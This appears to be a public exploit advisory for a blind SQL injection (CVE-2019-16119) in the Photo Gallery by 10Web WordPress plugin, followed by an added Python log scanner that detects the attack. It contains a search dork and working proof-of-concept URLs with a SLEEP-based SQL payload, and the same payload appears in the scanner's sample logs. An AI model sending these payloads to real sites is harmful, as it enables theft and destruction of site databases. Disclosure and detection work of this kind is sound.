# Exploit Title: WordPress Plugin Photo Gallery by 10Web <= 1.5.34 - Blind SQL injection
# inurl:"\wp-content\plugins\photo-gallery"
# Date: 09-10-2019
# Exploit Author: MTK (http://mtk911.cf/)
# Vendor Homepage: https://10web.io/
# Software Link: https://downloads.wordpress.org/plugin/photo-gallery.1.5.34.zip
# Version: Up to v1.5.34
# Tested on: Apache2/WordPress 5.2.2 - Firefox/Windows - SQLMap
# CVE : 2019-16119
# Software description:
Photo Gallery is the leading plugin for building beautiful mobile-friendly galleries in a few minutes.
# Technical Details & Impact:
Through the SQL injection vulnerability, a malicious user could inject SQL code in order to steal information from the database, modify data in the database, or even delete the database or the data in it.
# POC
In Gallery Group tab > Add new, and in add galleries / Gallery groups, the GET request sent with the parameter album_id is vulnerable to time-based blind SQL injection.
Following is the POC:
1. http://127.0.0.1/wp-admin/admin-ajax.php?action=albumsgalleries_bwg&album_id=<SQLi+HERE>&width=785&height=550&bwg_nonce=9e367490cc&
2. http://127.0.0.1/wp-admin/admin-ajax.php?action=albumsgalleries_bwg&album_id=0 AND (SELECT 1 FROM (SELECT(SLEEP(10)))BLAH)&width=785&height=550&bwg_nonce=9e367490cc&
# Timeline
09-01-2019 - Vulnerability Reported
09-03-2019 - Vendor responded
09-04-2019 - New version released (1.5.35)
09-10-2019 - Full Disclosure
# References:
Photo Gallery by 10Web – Mobile-Friendly Image Gallery
https://plugins.trac.wordpress.org/changeset/2150912/photo-gallery/trunk/admin/controllers/Albumsgalleries.php?old=1845136&old_path=photo-gallery%2Ftrunk%2Fadmin%2Fcontrollers%2FAlbumsgalleries.php
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16119
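A log check for the request described in the POC, as an added example that is not part of the original advisory or the plugin's code: it flags admin-ajax.php requests with action=albumsgalleries_bwg whose decoded album_id is not a plain integer. Assumptions: a combined-format access log, legitimate album_id values being numeric IDs, and the constructed sample lines below.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Request field of a combined-format access log line (format is an assumption).
# ".+?" rather than "\S+" so targets logged with raw spaces still match.
REQUEST_RE = re.compile(r'"(?:GET|POST) (.+?) HTTP/[\d.]+"')
VULN_ACTION = "albumsgalleries_bwg"  # AJAX action named in the advisory

# Constructed sample lines (documentation IP address, placeholder nonce).
SAMPLE_LOG = [
    '203.0.113.7 - - [10/Sep/2019:10:00:01 +0000] "GET /wp-admin/admin-ajax.php'
    '?action=albumsgalleries_bwg&album_id=0&width=785&height=550&bwg_nonce=NONCE'
    ' HTTP/1.1" 200 5123',
    '203.0.113.7 - - [10/Sep/2019:10:00:09 +0000] "GET /wp-admin/admin-ajax.php'
    '?action=albumsgalleries_bwg'
    '&album_id=0%20AND%20(SELECT%201%20FROM%20(SELECT(SLEEP(10)))BLAH)'
    '&width=785&height=550&bwg_nonce=NONCE HTTP/1.1" 200 5123',
    '203.0.113.9 - - [10/Sep/2019:10:01:00 +0000] "GET /wp-admin/admin-ajax.php'
    '?action=heartbeat&album_id=abc HTTP/1.1" 200 12',
]


def suspicious_album_id(log_line):
    """Return the decoded album_id if it is not a plain integer, else None."""
    m = REQUEST_RE.search(log_line)
    if m is None:
        return None
    url = urlsplit(m.group(1))
    if not url.path.endswith("/wp-admin/admin-ajax.php"):
        return None
    params = parse_qs(url.query, keep_blank_values=True)
    if VULN_ACTION not in params.get("action", []):
        return None
    for value in params.get("album_id", []):
        # parse_qs has already decoded %XX and "+"; check every repeated value.
        if not re.fullmatch(r"\d+", value.strip()):
            return value
    return None


def scan(lines):
    """Return (line_number, decoded album_id) for every flagged line."""
    checked = ((n, suspicious_album_id(l)) for n, l in enumerate(lines, 1))
    return [(n, v) for n, v in checked if v is not None]


if __name__ == "__main__":
    for number, value in scan(SAMPLE_LOG):
        print(f"line {number}: non-integer album_id {value!r}")
```

A hit on a site still running 1.5.34 or earlier is a reason to review the database and upgrade to the fixed release (1.5.35) named in the timeline.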